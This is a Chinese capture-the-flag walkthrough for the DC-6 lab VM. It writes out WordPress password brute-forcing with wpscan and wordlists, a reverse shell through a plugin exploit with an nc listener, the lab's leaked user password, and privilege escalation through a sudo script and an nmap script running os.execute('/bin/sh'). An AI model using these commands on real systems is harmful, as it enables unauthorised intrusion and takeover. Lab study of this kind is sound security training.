DC-6靶场
创始人
2024-05-29 18:26:46
0

文章目录

  • 下载地址
  • 信息搜集
  • 密码爆破
  • 反弹shell
  • 提权
  • 得到flag

下载地址

DC-6下载地址

信息搜集

image-20230306175956038

获取地址,发现地址为192.168.28.138,然后直接nmap全扫描。

image-20230306180045571

首先,发现了

http-title: Did not follow redirect to http://wordy/  

地址被指向了wordy ,所以需要去修改一下hosts的配置。

vim /etc/hosts
192.168.28.138 wordy

image-20230306180405516

其次,明显的看出来该靶场大概的系统及版本,直接用dir扫。

image-20230306180752558

在/wp-login.php发现登录框,跟之前那个一样,直接爆破账号密码。

密码爆破

首先用wpscan爆破出密码。

image-20230306181241370

扫出来5个,存入user.txt文件。

然后用cewl去爬密码。

cewl http://wordy -w passwd.txt

直接用wpscan爆破。

wpscan --url http://wordy -U user.txt -P passwd.txt

但是没爆破出来,去换一下自带吗密码库,继续尝试。

gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwd.txt
wpscan --url wordy -U user.txt -P passwd.txt

没跑破完就出来一个。

image-20230306182318085

直接登录,发现了版本信息,在后台发现了插件。

image-20230306183633836

反弹shell

在网上搜索后发现此插件存在漏洞,searchsploit搜一下。

image-20230306184151224

然后下载下来,修改

image-20230306215907652

然后在本地起一个http服务。(这里以python3演示)

python -m http.server 80

image-20230306215314576

然后本地访问即可。

image-20230306215424857

先本地开启nc接收,然后点击一下即可。

提权

先进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

find里没有找到flag,但是在mark目录里得到了things-to-do.txt文件。

Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得密码后直接ssh远程登录。

ssh graham@192.168.28.138

image-20230306223008867

查看可执行命令,发现了以jens身份执行的文件。

image-20230306223511726

看一下,在结尾加上/bin/sh。(需要在/home/jens目录下)

然后以jens的身份去执行命令,身份会切换到jens。

sudo -u jens ./backups.sh

image-20230306224116075

继续查看可执行命令。

image-20230306224433731

然后发现了nmap,利用其提权。(这种操作第一次见)

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

得到flag

进入root模式后直接cd进入root目录然后即可看到theflag.txt。

image-20230306225815889

相关内容

热门资讯

【NI Multisim 14...   目录 序言 一、工具栏 🍊1.“标准”工具栏 🍊 2.视图工具...
银河麒麟V10SP1高级服务器... 银河麒麟高级服务器操作系统简介: 银河麒麟高级服务器操作系统V10是针对企业级关键业务...
不能访问光猫的的管理页面 光猫是现代家庭宽带网络的重要组成部分,它可以提供高速稳定的网络连接。但是,有时候我们会遇到不能访问光...
AWSECS:访问外部网络时出... 如果您在AWS ECS中部署了应用程序,并且该应用程序需要访问外部网络,但是无法正常访问,可能是因为...
Android|无法访问或保存... 这个问题可能是由于权限设置不正确导致的。您需要在应用程序清单文件中添加以下代码来请求适当的权限:此外...
北信源内网安全管理卸载 北信源内网安全管理是一款网络安全管理软件,主要用于保护内网安全。在日常使用过程中,卸载该软件是一种常...
AWSElasticBeans... 在Dockerfile中手动配置nginx反向代理。例如,在Dockerfile中添加以下代码:FR...
AsusVivobook无法开... 首先,我们可以尝试重置BIOS(Basic Input/Output System)来解决这个问题。...
ASM贪吃蛇游戏-解决错误的问... 要解决ASM贪吃蛇游戏中的错误问题,你可以按照以下步骤进行:首先,确定错误的具体表现和问题所在。在贪...
月入8000+的steam搬砖... 大家好,我是阿阳 今天要给大家介绍的是 steam 游戏搬砖项目,目前...